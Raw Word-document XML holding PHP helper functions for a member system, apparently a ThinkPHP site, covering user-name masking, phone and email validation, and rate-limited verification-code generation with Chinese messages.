    <w:p w14:paraId="3C8D83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foreach($arr as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0298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if($v['tid'] == $tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CDB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$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B50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array_merge($data,_typeidTid($arr,$v['id']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077963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F101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C69F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3CF4B7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32331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_count($table,$where=[],$field='id'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48402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if(!$table){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152A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请输入数据表统计</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B595A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DDF61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$data=Db::name($table)-&gt;where($where)-&gt;count($field);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB35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379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3C111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0C90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_flags($id,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4536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5C397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$data=Db::name('flags')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E13B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2B351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0457B0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284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AFD5E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50E6D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_userGroups($jingyan=0,$name='title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25869C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$db=Db::name('member_groups')-&gt;where('jingyan','elt',$jingyan)-&gt;order('id desc')-&gt;cache(_cache('db'))-&gt;value($name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C42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$db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38F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71224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_records($uid='',$text='',$money='',$type='',$data=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD9F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 &amp;&amp; !$text){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEF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0B4BA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4D0F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$where['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D64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$where['text']=$text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD951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$where['money']=$money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06D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$where['type']=$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F910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$where['data']=$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0653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$where['time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB38A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$where['ip']=_ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDACD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$where['system']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA8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$db=DB::name('member_records')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578492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140757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8B23C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_user($id='',$name='',$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCB7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return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F9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$data=Db::name('member')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470E4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09FC96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3A1D8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A46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if($data['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C4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$data['username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CB19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if($data['user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D4B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$data['username']=$data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F4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if($data['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072916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if($fuhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E12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$data['username']=substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E673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9E3B1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$data['username']=$data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E4A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1FF4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if($data['email']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D069D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if(!$fuhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE45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explode('@',$data['email']);            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E82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 = substr($data['email'],0,2).$fuhao.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF43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186C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$data['username']=$data['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97D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73D8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A42F3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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'._userName_id($data['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358B11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359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if(!$data['qianming']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296957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$data['qianming']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这家伙好懒，什么都不留下！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941D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F3FC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if(!$data['img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139B3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 '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE25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CE34C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$data['img']=_imgUrl().$data['img']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2709A9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B022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$yaoqing=Db::name('yaoqing')-&gt;where(['uid'=&gt;$data['id']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583883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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BFE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$yaoqing=Db::name('yaoqing')-&gt;insert(['uid'=&gt;$data['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF606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6D5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$data['yaoqing']=$yaoqing;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577FA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$data['sfz'] = Db::name('member_sfz')-&gt;where(['uid'=&gt;$data['id']])-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9C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1CD752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$data[$name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D2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1B73D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2DBC28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642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AFB1F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_userName_id($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE153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base_convert($id, 9, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655177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15E0A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_userData($data,$field='nickname',$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC59B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 return '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6F6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if($data['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F565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$data['username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6FC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if($data['user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF2A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$data['username']=$data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B567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if($data['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204EAA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if($fuhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501EA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$data['username']=substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DF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1E543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$data['username']=$data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EB4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649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if($data['email']){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD41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if(!$fuhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DB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explode('@',$data['email']);            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D23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 = substr($data['email'],0,2).$fuhao.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A345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AA598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$data['username']=$data['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1BD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1EFB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79BE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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F28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694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if(!$data['qianming']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCE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$data['qianming']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这家伙好懒，什么都不留下！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFE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1AA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if(!$data['img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496B8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$data['img']='/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FA8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99F2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if($field){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F023B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$data[$field];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD7D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78EB4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$data['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFB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F922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CBEF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_username($data,$fuhao='****'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D07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if($data['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BE9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$data['username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788DF2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if($data['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789315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if($fuhao){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBD2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$data['username']=substr($data['mobile'],0,3).$fuhao.substr($data['mobile'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1043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40AAF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$data['username']=$data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7905D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E742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5FCA6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18848A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B88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$data['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564052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CB9C9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_userImg($img='',$w='',$h=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77F6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5B3F5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'/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787F3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5A695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$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEDD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0413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8783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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检测是否手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD5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_isMobile($mobile=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA9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if(!$mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD5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14CD9F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5E35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if(strlen($mobile)!=11){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D86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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F60FB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9AD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2CD51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(!is_numeric($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C9C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7E59B6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C68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preg_match('#^13[\d]{9}$|^14[5,7]{1}\d{8}$|^15[^4]{1}\d{8}$|^17[0,6,7,8]{1}\d{8}$|^18[\d]{9}$#', $mobile) ? true : false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25734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1EBB1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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检测是否邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A058B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_isEmail($email=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8DE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if(mb_strlen($email)&lt;5){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321242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017BB1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4612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$res="/^([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F1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if(preg_match($res,$email)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9189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464438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273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74F43F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47B5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F1C6B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_code($username='',$content=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DF1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if(!$username){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929E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号码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E1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001F1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if(!$content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55987F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验证码第二个参数不可为空，请检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_code()</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数第二个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567074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435D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$mobile=$email=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68CA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if(_isMobile($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61391F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$mobile=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678787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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569C2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if(_isEmail($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A8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$email=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728BD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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F6BB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8BFD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号码格式错误，请检查号码是否正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39945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A57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if(!$mobile &amp;&amp; !$email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65470F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号码格式错误，请检查号码是否正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236DA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5A3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480182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if(!$ip) return 'IP</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地区异常或无法获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF15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$nus=10;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173E8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$count=Db::name('code')-&gt;where('username',$username)-&gt;whereTime('time', 'd')-&gt;fetchSql(false)-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B47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if($count &gt; $nus){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3572D2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请不要频繁刷验证码，每天最多获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$nus.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，请明天获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB9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5AB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773B04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$db=Db::name('code')-&gt;where('username',$username)-&gt;order('id desc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19E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1C9FE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$maturity=$db['time']+$db['maturity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2473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if($maturity &gt; $time){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A67E9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请不要频繁操作，等待</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.($maturity-$time).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒后再获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$name.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6370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EA8E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5D7F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$code=rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF64C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$shijian=120;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E2D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$where['username']=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD2E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$where['code']=$code;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EECE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$where['time']=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163EE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$where['maturity']=$shijian;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5DC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$where['ip']=$ip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB16D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$where['content']=$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D45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$where['system']=$_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AD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if($content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账户注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2A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$temp['name']='tempReg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B0B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$sdkMobile='sdkReg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FCC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if($content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45230D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$temp['name']='tempLogin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE4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$sdkMobile='sdkLogin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D21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if($content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找回密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA6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$temp['name']='tempPwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787065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$sdkMobile='sdkPwd';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE85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 if($content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' || $content=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90C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$temp['name']='tempMobile';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06046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$sdkMobile='sdkMobile';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348B3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7284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$temp=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E312A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$sdkMobile=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28E1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5D76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if($temp){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32906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$temp['type']='sdkTemp';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904D7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$temp=Db::name('member_config')-&gt;where($temp)-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC38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$time=2;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAA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$title=config('config')['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6D3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$temp=str_replace("\${code}",$code,$temp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC7E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$Send = new Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5845C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r w:rsidRPr="008320C6">
        <w:rPr>
